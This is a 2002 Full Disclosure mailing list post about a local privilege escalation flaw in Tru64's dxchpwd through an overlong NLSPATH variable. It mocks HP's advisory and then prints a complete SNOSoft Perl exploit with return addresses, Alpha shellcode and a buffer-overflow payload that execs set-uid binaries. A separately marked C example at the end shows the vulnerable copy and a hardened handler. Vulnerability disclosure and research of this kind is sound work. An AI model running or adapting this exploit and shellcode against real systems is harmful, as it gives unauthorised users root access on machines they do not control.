Full Disclosure mailing list archives

In regards to ... http://online.securityfocus.com/bid/5382


From: full-disclosure () lists netsys com (KF)
Date: Mon, 5 Aug 2002 12:22:18 -0700

In regards to ... http://online.securityfocus.com/bid/5382 and
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README

- SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium)  why medium? Because the public had not seen an exploit?

This ECO has not been through an exhaustive field test process.
Due to the experimental stage of this ECO/workaround, Hewlett-Packard
makes no representations regarding its use or performance. The
customer shall have the sole responsibility for adequate protection
and back-up data used in conjunction with this ECO/workaround.
^--- hrmm cute.

I think I can make one of those right quick too.

This SNOSoft Proof of Concept Tool has not been through an exhaustive
field test process. Due to the experimental stage of this Tool, SNOSoft
makes no representations regarding its use or performance. The
customer of Compaq / HP shall have the sole responsibility for adequate protection
and back-up data used in conjunction with his or her own system and the use of the
following SNO/Proof of Concept Tool.

Official SNO workaround is:
See vendor or if paranoid chmod -s everything in sight.

This is supposed to be the vendor fix... I have not tested it. I assume with the
coordination from CERT and the conscious decision to release a public patch
that the vendor has provided a good workaround.

http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README

Please note after all the public drama with HP look whose name ends up in the credit section. *grin*
Good find guys... let's give the HP dev staff a round of applause. *sarcasm*

Tru64 DXCHPWD Local Privilege Escalation Vulnerability
Credit:
            Published in a Compaq security advisory.


Hrmm how nice of them to mention us.
I will give someone a cookie if they can tell me when NLSPATH was first a big issue on OTHER unix systems.

I hope this isn't broken... if it is don't whine to me ... fix it.

--- begin copyrighted material

#!/usr/bin/perl -w
#
# stripey (stripey () snosoft com)
#
# This code is copyrighted by Snosoft
# http://www.snosoft.com
# If you are a direct employee of HP or Compaq
# you are not allowed to look at this program or use it.
# in order to protect our copyright on this
# program we have crippled it (at least) by adding
# _IWORKATHP to some part of the code. If
# you do not work for HP or Compaq you may
# remove these letters at will provided this copyright notice
# remains attached to the header of this code.
# As stated above if you work at hp you should
# not even be reading at this point. However if
# you are please note that by removing the letters
# _IWORKATHP from this document you are violating
# the DMCA section 1201(a)

# Also Please note that most of the targets in
# this are removed pending CERT releases.

$tgts{"0"} = pack("l",0x40010c04).":/usr/dt/bin/SORRY";
$tgts{"1"} = pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA";
$tgts{"2"} = pack("l",0x40014280).":/usr/sbin/HRMMM";
$tgts{"3"} = pack("l",0x4003c190).":/usr/bin/LALALALAL";
$tgts{"4"} = pack("l",0x400361f0).":/usr/bin/HARHAR";
$tgts{"5"} = pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd";
$tgts{"6"} = pack("l",0x400120b0).":/usr/bin/OOPS";
$tgts{"7"} = pack("l",0x400105e8).":/usr/bin/DECLANR0X";

unless (($target,$offset,$align) = @ARGV,$align) {

        print "\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key. $b\n";
        }

        print "\n";

        exit 1;
}

($a,$b) = split(/\:/,$tgts{"$target"});

print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";

$ret = pack("ll",(unpack("l",$a)+$offset), 0x1);

# GOBBLES someday I will switch gears in the sweat shop and
# get that shellcode wrote up. That was quite the entertaining
# talk or speech or whatever this weekend.

# shellcode by Taeho Oh

$sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .= "\x20\x35\x60\x42\xff\xff\xff\xff";

$tlen = (1024-(length($sc)))/4;
$buf .= "B"x$align;
$buf .= pack("l",0x47ff041f)x($tlen-1);
$buf .= $sc;
$buf .= $ret;

$ENV{"NLSPATH"} = $buf;

if ($target == 7) { print "Hit ctrl-d...\n"; }

if ($target == 6) {
        exec("$b","-d","a=asdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'");
} else {
        exec("$b");
}

---- end copyrighted material

-KF
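Added defender-side illustration, not part of KF's post or the SNOSoft tool: the bug class the tool above targets is a set-uid program copying the attacker-controlled NLSPATH environment variable into a fixed stack buffer with no length check, so a 1024-byte value reaches the saved return address. The hardened handler beside it ignores the variable entirely when the process runs with elevated privileges, caps its length, rejects control bytes, and otherwise falls back to the compiled-in catalog path. All function and constant names are hypothetical, and the default path is a constructed placeholder.

```c
/* Added example (not from KF's post or the SNOSoft tool). Names are
 * hypothetical; DEFAULT_NLSPATH is a constructed placeholder. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NLSPATH_MAX 256                 /* fixed buffer, as in a classic catopen() caller */
#define DEFAULT_NLSPATH "/usr/lib/nls/msg/%L/%N"

/* BEFORE: the vulnerable pattern. An environment variable the caller controls
 * is copied into a fixed buffer with no bound, so an over-long NLSPATH in a
 * set-uid binary overwrites whatever sits past 'dst' on the stack. */
void copy_nlspath_unsafe(const char *value, char *dst /* NLSPATH_MAX bytes */)
{
    if (value != NULL)
        strcpy(dst, value);             /* unbounded copy: the overflow */
}

/* AFTER: bounded, validated, and ignored entirely when privileged.
 * Returns 1 if 'value' was accepted into 'out', 0 if the built-in default was
 * written instead (absent, empty, too long, control bytes, or privileged). */
int load_nlspath_hardened(const char *value, int privileged, char *out, size_t outlen)
{
    size_t n;
    if (value == NULL || privileged)    /* environment is untrusted once uid != euid */
        goto use_default;
    n = strlen(value);
    if (n == 0 || n >= outlen)          /* no room for NUL: reject, never silently truncate */
        goto use_default;
    for (size_t i = 0; i < n; i++)      /* catalog paths are printable; a payload is not */
        if ((unsigned char)value[i] < 0x20 || (unsigned char)value[i] == 0x7f)
            goto use_default;
    memcpy(out, value, n + 1);
    return 1;
use_default:
    snprintf(out, outlen, "%s", DEFAULT_NLSPATH);
    return 0;
}

/* Wrapper for a real process: same decision glibc's secure_getenv() makes for
 * NLSPATH. Where available, issetugid() or AT_SECURE is the stronger test. */
int load_nlspath_from_env(char *out, size_t outlen)
{
    int privileged = (getuid() != geteuid()) || (getgid() != getegid());
    return load_nlspath_hardened(getenv("NLSPATH"), privileged, out, outlen);
}
```

The same reasoning backs the post's "chmod -s everything in sight" workaround: a binary that no longer runs set-uid has no privilege for a corrupted NLSPATH to hand over.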


